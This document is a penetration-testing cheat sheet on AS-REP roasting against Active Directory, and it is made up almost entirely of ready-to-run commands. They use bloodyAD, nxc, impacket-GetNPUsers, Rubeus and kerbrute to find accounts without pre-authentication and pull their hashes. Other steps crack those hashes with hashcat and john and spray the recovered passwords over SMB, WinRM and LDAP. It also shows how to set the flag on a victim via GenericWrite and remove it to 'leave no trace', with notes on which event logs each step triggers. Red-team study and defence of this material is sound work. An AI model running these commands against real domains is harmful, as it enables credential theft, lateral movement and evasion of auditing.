AS-REP Roasting

Sections AS-REP Roasting

Request a TGT for any user without DONT_REQ_PREAUTH set. The response is encrypted with the user’s NT key. Crack offline.

DC=10.10.11.50
DOMAIN=corp.local
USER='svc_user'
PASS='Password1'

i. Find AS-REP roastable users

UAC flag is DONT_REQ_PREAUTH (bit 4194304 / 0x400000).

BloodHound:

MATCH (u:User {dontreqpreauth: true, enabled: true}) RETURN u.name

bloodyAD filter:

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get search \
  --filter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' \
  --attr samaccountname

nxc enumerates and pulls hashes in one call (see next section).

ii. With creds, roast everything

nxc, pulls every no-preauth user automatically:

nxc ldap $DC -u $USER -p $PASS --asreproast asrep.txt
nxc ldap $DC -u $USER -H $NTHASH --asreproast asrep.txt
## When DNS is funky:
nxc ldap $DC -u $USER -p $PASS --asreproast asrep.txt --kdcHost $DOMAIN

impacket-GetNPUsers:

impacket-GetNPUsers -dc-ip $DC -request "$DOMAIN/" -usersfile users.txt -format hashcat -outputfile asrep.txt
## With creds (no usersfile needed, enumerates from LDAP):
impacket-GetNPUsers -dc-ip $DC -request "$DOMAIN/$USER:$PASS" -format hashcat -outputfile asrep.txt
impacket-GetNPUsers -dc-ip $DC -request -hashes :$NTHASH "$DOMAIN/$USER" -format hashcat -outputfile asrep.txt

Rubeus from Windows:

Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Rubeus.exe asreproast /user:victim /format:hashcat /outfile:asrep.txt

iii. Without creds, just a user list

This is why AS-REP roasting is special: you don’t need a valid credential, just a username to test. kerbrute + nxc combo:

## 1. Enumerate valid usernames
kerbrute userenum -d $DOMAIN --dc $DC /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -o users.valid

## 2. nxc with empty password against the user list
nxc ldap $DC -u users.valid -p '' --asreproast asrep-anon.txt

Or impacket directly with a username list and no creds:

impacket-GetNPUsers -dc-ip $DC -no-pass -usersfile users.valid -format hashcat -outputfile asrep.txt

Always test

Even when you don’t know if any users are no-preauth, run nxc ldap $DC -u users.valid -p '' --asreproast - empty hash file = nothing to roast, valid hashes = free creds.

iv. Targeted AS-REP (set DONT_REQ_PREAUTH yourself)

When you have GenericWrite (or any UAC-write right) on a user, flip the flag, roast, flip it back. bloodyAD makes this clean:

## 1. Add the flag
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC add uac victim -f DONT_REQ_PREAUTH

## 2. Roast the now-vulnerable user
impacket-GetNPUsers -dc-ip $DC -no-pass -usersfile <(echo victim) -format hashcat -outputfile asrep.txt
## or nxc:
nxc ldap $DC -u victim -p '' --asreproast asrep.txt

## 3. Remove the flag, leave no trace
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC remove uac victim -f DONT_REQ_PREAUTH

This is the cleanest “I have GenericWrite on someone” -> “I have their hash” chain. Often easier than targeted kerberoast because it doesn’t require the user to have an SPN attribute.

v. Cracking the hash

Format is $krb5asrep$23$user@DOMAIN:checksum$ciphertext.

Hashcat:

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 18200 asrep.txt rockyou.txt -r OneRuleToRuleThemAll.rule

John:

john --format=krb5asrep --wordlist=rockyou.txt asrep.txt

AS-REP hashes use RC4 (etype 23) by default for the encrypted portion, so cracking speed is comparable to kerberoasting RC4 (much faster than AES TGS).

vi. After cracking, what to do

The cracked credential belongs to the no-preauth user. Service accounts and shared accounts are often flagged DONT_REQ_PREAUTH because the admin couldn’t get Kerberos pre-auth to work and disabled it. Spray it everywhere:

nxc smb $DC -u victim -p 'Cracked123!' --shares
nxc winrm $DC -u victim -p 'Cracked123!'
nxc ldap $DC -u victim -p 'Cracked123!' --users

Then re-collect BloodHound to see what edges open up from the newly-owned user.

vii. Why AS-REP roasting is everywhere

Old smartcard / multi-domain setups disable pre-auth for compatibility
Some legacy apps fail with pre-auth enabled, admins disable it as a quick fix
Auto-provisioning scripts sometimes set the flag during user creation and never unset it
DONT_REQ_PREAUTH is rarely audited because it doesn’t generate normal logs

On a real engagement, even one no-preauth account in a domain of 10,000 users is often enough to start the chain.

viii. OpSec

Each AS-REP request logs as Event 4768 on the DC (TGT requested)
Empty-password binds for asreproast don’t log as 4625 (failed auth), they just look like AS_REQs
Targeted ASREP via UAC flip leaves an audit trail in 5136 (directory object modified) if AD auditing is enabled
Always remove the flag immediately after roasting in section iv

i. Find AS-REP roastable users #

ii. With creds, roast everything #

iii. Without creds, just a user list #

iv. Targeted AS-REP (set DONT_REQ_PREAUTH yourself) #

v. Cracking the hash #

vi. After cracking, what to do #

vii. Why AS-REP roasting is everywhere #

viii. OpSec #